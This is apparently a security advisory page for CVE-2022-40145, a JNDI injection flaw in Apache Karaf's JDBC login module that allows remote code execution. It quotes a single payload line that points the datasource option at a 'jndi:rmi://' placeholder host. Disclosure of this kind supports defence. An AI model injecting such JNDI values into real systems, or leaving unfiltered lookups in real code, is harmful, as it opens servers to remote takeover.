Skip to main content

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

CVE-2022-40145

Severity High
Score 9.8/10

Summary

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function "jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc."JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf prior to 4.3.8 and 4.4.0 prior to 4.4.2.

  • LOW
  • NETWORK
  • HIGH
  • UNCHANGED
  • NONE
  • NONE
  • HIGH
  • HIGH

CWE-74 - Injection

Listed as the number one web application security risk on the 'OWASP Top Ten', injection attacks are widespread and dangerous, especially in legacy applications. Injection attacks are a class of vulnerabilities in which an attacker injects untrusted data into a web application that gets processed by an interpreter, altering the program's execution. This can result in data loss/theft, loss of data integrity, denial of service, and even compromising the entire system.

Advisory Timeline

  • Published